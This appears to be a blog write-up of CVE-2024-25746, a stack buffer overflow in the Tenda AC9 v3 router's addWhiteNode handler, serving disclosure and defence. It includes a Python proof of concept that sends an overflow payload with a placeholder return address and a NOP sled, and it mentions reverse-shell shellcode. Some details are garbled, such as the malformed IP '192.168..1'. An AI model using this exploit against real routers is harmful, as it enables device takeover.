CVE-2024-25746 - Remote Code Execution via Stack-Based Buffer Overflow in Tenda AC9 v3. (Firmware v15.03.06.42_multi) — Deep Dive & Exploit Details

Home routers are critical for network security, but often run outdated firmware with serious vulnerabilities. CVE-2024-25746 is a newly discovered flaw in the popular Tenda AC9 v3. (firmware v15.03.06.42_multi) router that allows hackers to take over devices remotely, threatening home and small office networks across the globe.

In this post, we'll break down what CVE-2024-25746 is, how it works under the hood, see a real code example, and walk through a demonstration exploit.

What Is CVE-2024-25746?

This is a *stack-based buffer overflow* vulnerability found in the add_white_node function of the Tenda AC9 v3. router firmware v15.03.06.42_multi.

Impact:
A remote attacker—without authentication—can send a specially crafted HTTP POST request to the router’s web interface. If successful, the router will execute attacker-supplied code with full system/root privileges. This can lead to malware installation, botnet activity, or complete LAN compromise.

The Vulnerable Function

Inside the router firmware's web server backend, the add_white_node function copies user input for the "white list" feature for MAC addresses into a stack buffer, without proper size checking.

Source Code Simplified (Pseudo C)

void add_white_node(char *input) {
    char buf[128]; // Fixed-size buffer on stack
    strcpy(buf, input); // Dangerous: no bounds check!
    // ... further code ...
}

Any input over 128 bytes will overflow buf, overwriting stack data—like the return address.

HTTP Endpoint Affected

This function can be triggered via an unauthenticated HTTP POST request to the router’s configuration web interface, typically at http://ROUTER-IP/goform/addWhiteNode.

Lack of Authentication:
A big part of the danger is that this endpoint does *not* require you to be logged in.

Proof of Concept Exploit

Let’s see how an attacker can use this vulnerability to hijack a router.

Step 1: Find the Target

Get the router's local IP (default: 192.168..1).

Step 2: Craft the Malicious Payload

We want to overflow buf and overwrite the return address, making the router run our own shellcode.

Python Exploit Example

import requests

# Replace with your target router's IP address
target = 'http://192.168..1/goform/addWhiteNode';

# Prepare payload:
# 128 bytes to fill the buffer, 4 bytes overwrite the return address,
# followed by shellcode (NOP sled + your payload, here for demonstration only)
payload = b'A' * 128                # Fill the buffer
payload += b'\xDE\xAD\xBE\xEF'      # Overwrite return address (example)
payload += b'\x90' * 32             # NOP sled
payload += b'\xcc' * 32             # Payload (int3 — crash or your shellcode)

data = {
    "mac": payload
}

resp = requests.post(target, data=data, timeout=5)
print(f"Status code: {resp.status_code}")

*On a real device, the shellcode would open a reverse shell, exfiltrate data, or drop persistent malware.*

Step 3: Send the Exploit

Run the script. If the return address points into our payload, we hijack execution.

How To Defend Yourself

- Update Firmware: Download the latest update from Tenda’s official website (if available).
- Restrict WAN Access: Never expose router admin interfaces to the Internet (disable remote management).

References

- GitHub Full Disclosure (PoC)
- CVE Details: CVE-2024-25746
- Official Tenda Firmware page

Conclusion

CVE-2024-25746 is a dangerously simple yet powerful exploit against the Tenda AC9 v3. router. All owners should patch as soon as possible, and everyone should avoid exposing admin ports to the web. This is a classic example of why input validation and secure coding practices matter—even for home and SOHO routers!

Timeline

Published on: 02/22/2024 22:15:47 UTC
Last modified on: 08/28/2024 18:35:09 UTC